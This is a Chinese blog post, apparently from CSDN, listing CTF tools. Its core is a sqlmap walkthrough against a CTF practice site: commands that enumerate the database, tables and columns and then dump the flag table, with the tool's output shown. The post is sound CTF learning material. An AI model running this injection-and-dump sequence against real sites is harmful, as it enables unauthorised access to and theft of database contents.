CTF会使用到的工具(边刷题边更新)

最新推荐文章于 2024-06-24 11:25:48 发布
最新推荐文章于 2024-06-24 11:25:48 发布
阅读量788 收藏 3
点赞数 1
分类专栏: ctf 文章标签: ctf tools ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37442062/article/details/89150405
版权

WEB

 

Sqlmap免Python环境版

常用的sqlmap命令——Sqlmap基础命令介绍及常用命令

例题练习 这个看起来有点简单

[root@Hacker~]# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db
//my_db数据库类型
[root@Hacker~]# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables
//查看my_db数据库的表
/*
[16:19:45] [INFO] fetching tables for database: 'my_db'
Database: my_db
[2 tables]
+---------+
| news    |
| thiskey |
+---------+
*/
[root@Hacker~]# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns
//查看表的列
/*
[16:21:06] [INFO] fetching columns for table 'thiskey' in database 'my_db'
Database: my_db
Table: thiskey
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| k0y    | text |
+--------+------+
*/
[root@Hacker~]# Sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump
/*
Database: my_db
Table: thiskey
[1 entry]
+----------------+
| k0y            |
+----------------+
| whatiMyD91dump |
+----------------+
*/


VBScript解密网站


 

 

进一寸有一寸的欢喜077
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
写一下自已对ctf的了解,以便日后自已需要
m0_50987622的博客
11-07 5974
11.7 本人ctf小白,参加比赛基本处于摸鱼状态,也没有系统了解过ctf以及做过相关的实践和练习,但是,对这一块比较感兴趣,所以,只能说,在学习中,就跟我当初学makefile一样,做下记录,写点自已觉得对自已有用的东西,大概这样。 ctf总共分为五部分,misc杂项,crypto解密加密,pwn攻破设备、系统,reverse逆向渗透,web网络安全。500pt的题都很难。 首先,建立在你对前后端足够了解的基础上。 web安全就是黑服务器,pwn就是黑设备黑系统,至于怎么黑,仁者见仁智者见智,取决
随波逐流CTF编码工具 V4.2 20230418
04-19
由随波逐编写开发,CTF编码工具为用户提供丰富的离线加密解密功能,还可以对字符编码进行转换,文件隐写查看,用户可以根据自己的需求来使用功能,非常实用,能够提高大家的工作效率! CTF编码工具是各种编码解码...
杂项相关工具使用方法(边刷题更新...)
_Co1a
11-01 1468
(1)010编辑器 010编辑器是一个可以查看十六进制文件的软件,一般在题目所给出文件,但又不知道文件的类型时。可以通过010编辑器打卡文件,获取文件的类型,一般文件类型在头部出现,例如上图文件的头部信息(最开始的前八个字节)可以知晓这是一个png文件。 更多文件头部信息:https://blog.csdn.net/qq_42777804/article/details/98876646 (2)wireshark 这是一个网络监听软件,可以监听所连接网络,获取通过这个网络收发信息的内容情况 更多wiresh
网络安全ctf比赛学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!
最新发布
wananxuexihu的博客
06-24 682
1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常用的编码、加解密、算法。2、CTF加解密工具箱:http://www.atoolbox.net/Category.php?Id=273、ctfhub在线工具:https://www.ctfhub.com/#/tools4、还有一些常用的网站字符串2进制互转:http://www.5ixuexiwang.com/str/from-binary.php。
CTF-Web小白入门篇超详细——了解CTF-Web基本题型及其解题方法 总结——包含例题的详细题解
热门推荐
日熙的博客
09-29 15万+
上次经过一次比赛的打击,决定不能只是一直盲目的刷基础题,应该加快进度,从各种基本题型开始下手,每种题型都应该去找题目刷一刷,并做好总结,于是乎决定写下这篇文章。之后边做题边更新,欢迎各位大佬指教。 本文目录基础知识类题目总结:具体题型包括:HTTP头相关的题目Git源码泄露Python爬虫信息处理PHP代码审计(重要!!!)XSS题目绕过wafSQL注入 基础知识类题目 总结: 1.是最基本...
南邮ctf-题解(停止更新)
reigns的博客
08-17 7220
由于专业名字叫网络空间安全,所以感觉不学点安全知识对不起专业名= =,本人大学四年完全没有接触过信息安全知识,发现本科母校有个网络安全训练平台,就开始练练手,做做ctf入门训练吧。 南京邮电大学网络攻防训练平台:http://ctf.nuptzj.cn/challenges# >_签到题: 就是直接查看网页源代码。 <html> <title>key...
CTF学习之路-攻防世界:MISC,入门篇
xuhc25的博客
11-26 3625
一、感谢和安利 我是从攻防世界入门的,感谢攻防世界的免费靶场 靶场地址:攻防世界 https://adworld.xctf.org.cn/ 二、MISC-新手练习篇Writeup 1、this_is_flag WP: 明显,入门用的,了解flag格式,直接提交题目例子的flag就可以了 flag{th1s_!s_a_d4m0_4la9} 2、pdf WP: 题目给的一个PDF文件,使用PDF编辑器打开(我用的是万兴PDF编辑器) 移出来看到就是flag了 3、give_you_flag WP:附件
BUUCTF百题刷题总结(一)
qwzf
09-14 2061
前言 最近打算开始刷BUU的Web题了,之前已经刷过一些,有的总结了,有的没有总结。总结过的这里只写之前总结的链接;没总结的,原因是当时感觉有点简单,这里简单写下考察知识点和解题思路。 新刷的Web题,认真总结。本篇主要记录之前刷的题,BUUCTF刷题系列持续更新(SQL注入题单独记录)! 0x01 [HCTF 2018]WarmUp 考点:PHP代码审计+绕过自定义函数+文件包含 查看源代码,发现source.php,访问发现源码 <?php highlight_file(__FILE_
ctf misc 从0开始学习
m0_74796779的博客
03-27 89
第二题: 这道题给出了一个GIF文件,打开可以看到,有几帧不一样的东西,这里就有很多种解法了,可以使用在线网站(http://duanzidao.com/),也可以使用stegsolve(这里建议使用stegsolve,因为后面的lsb隐写也用到,这是大佬的详细的文章:https://blog.csdn.net/weixin_46175844/article/details/105395988),将gif文件逐帧分解,就可以得到三张不一样的图片。当前只写了这些,之后慢慢修改。
给你规划大学四年任务,毕业即可从事网络安全工程师,轻松拿到offer
2401_84264662的博客
05-04 734
大二开刷ctf题,参加ctf比赛,边练边学边打比赛,缺什么知识学什么,在大一打好基础后去刷ctf题,否则大概率面对给你writeUp你都看不懂的情况,除此之外专业课尽量做到精益求精,不必在乎专业课期末考试考出的分数,而是多实践多写代码。打比赛争取拿到一些奖项,大二暑假最好能够争取到安全公司的实习或者参与一些hw的活动。
2021年总结:缘起性空,归来不少年——回顾这荆棘的一年
杨秀璋的专栏
01-05 3万+
2021年已经离去,感谢大家的陪伴和帮助,感谢家人的鼓励。转眼,这已是我在CSDN写下的第九篇年终总结,真是岁月如梭。《缘起性空,归来不少年》。是啊,归来不再少年,我已经是而立之年了。当我写下这几个字的时候,心里还沉甸甸的。曾经的我总以为,博士毕业继续回到贵州教书,陪伴家人,仍是少年,真的如此吗?或许现实将更加残忍,岁月将不饶人,这荆棘一年让我意识到,我已为人父,不再少年。
网络安全CTF比赛工具集(整合版)
01-04
涵盖在线工具以及其他好用的工具包, 在线工具:导航型站点,CTF大集合。 CTF工具包:包里有CTF相关的各种工具,包括逆向,解密,WEB,密码学等等,相当有用,可以方便地准备各种CTF比赛。
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码编码类型的功能,大大减少手工判断和重复尝试的时间,使密码解码更为便捷高效。
[随波逐流]CTF编码工具3.5 V20221008
10-09
由随波逐编写开发,CTF编码工具为用户提供丰富的加密解密功能,还可以对字符编码进行转换,用户可以根据自己的需求来使用功能,非常实用,能够提高大家的工作效率! CTF编码工具是各种编码解码离线集成:包括...
[随波逐流]CTF编码工具3.2 V20220815
09-16
由随波逐编写开发,CTF编码工具为用户提供丰富的加密解密功能,还可以对字符编码进行转换,用户可以根据自己的需求来使用功能,非常实用,能够提高大家的工作效率! CTF编码工具是各种编码解码离线集成:包括...
XCTF MISC 新手base64stego解题思路
m0_37442062的博客
05-24 9255
0x00 题目链接 here 0x01 zip伪加密 使用ZipCenOp.jar java -jar ZipCenOp.jar r flag.zip#把flag.zip放到该目录下 解压得到stego.txt 打开如下: U3RlZ2Fub2dyYXBoeSBpcyB0aGUgYXJ0IGFuZCBzY2llbmNlIG9m IHdyaXRpbmcgaGlkZGVuIG1lc...
CTF流量分析题
m0_37442062的博客
05-03 3933
1.flag被盗了,pcap(gnnl) 尝试http过滤,get或者post追踪tcp流即可,这里是post, flag{This_is_a_f10g} 2.这么多数据包找找吧,先找到getshell的流pcap(vn78) 过滤tcp TCP流通常是命令行操作 Q0NURntkb195b3VfbGlrZV9zbmlmZmVyfQ== 解码:CCTF{do_you_like_sniffer} 3.有一天皓宝宝没了流量只好手机来共享,顺便又从手机发了点小秘密到电脑,你能找到它吗?
2021-05-03Wireshark流量包分析
m0_37442062的博客
05-03 3210
目录 WEB扫描分析 后台目录爆破分析 后台账号爆破 WEBSHELL上传 其他题目 参考链接 WEB数据包分析的题目主要出现WEB攻击行为的分析上, 典型的WEB攻击行为有:WEB扫描、后台目录爆破、后台账号爆破、WEBSHELL上传、SQL注入等等。 WEB扫描分析 题型: 通过给出的流量包获取攻击者使用的WEB扫描工具。 解题思路: 常见的WEB扫描器有Awvs,Netsparker,Appscan,Webinspect,Rsas(绿盟极光),Nessus,We...
CTF理论考核精选题与答案解析
3. **文件上传安全** - 如果页面禁止PHP文件上传,尝试使用扩展名绕过限制,只有`123.PHP`和`123.PhP`的格式被识别为PHP文件,而`123.php`不正确,因为大小写敏感。A选项不能成功上传。 4. **文件上传漏洞** - A...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值